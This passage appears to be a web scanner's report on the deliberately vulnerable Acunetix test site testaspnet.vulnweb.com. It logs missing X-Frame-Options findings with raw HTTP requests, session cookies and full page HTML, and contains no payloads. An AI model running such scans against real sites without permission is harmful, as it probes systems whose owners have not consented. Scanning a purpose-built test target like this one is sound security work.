style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
Method	GET
Parameter	X-Frame-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 349 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=3 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 17979
Response Body - size: 17,979 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=3" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmNkZGTLo6VVRRdQACEbfKXC37R1sHPpoA==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK30rH2AgL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBE1qoi/TB7mR4IysbuEg0lOgmHIs" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV> <DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently, therefore it is not recommended that the same beta version is used for more than 30 days. To beta-test beyond 30 days, users should install the latest beta version or, if available, use the release version.</p> <p><strong>About Acunetix Web Vulnerability Scanner</strong><br /> Acunetix Web Vulnerability Scanner, a unique web application scanning product that makes securing one’s website easier than ever. Acunetix Web Vulnerability Scanner is an automated web application security testing tool that crawls an entire website and attacks it so as to identify potential weaknesses before hackers do. Further information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=3&NewsAd=ads/def.html
Method	GET
Parameter	X-Frame-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 484 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=3&NewsAd=ads/def.html HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/ Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:42:24 GMT Content-Length: 18040
Response Body - size: 18,040 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=3&NewsAd=ads%2fdef.html" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkSGybNfT47lMyCtVUwkelFkD9wY8=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> 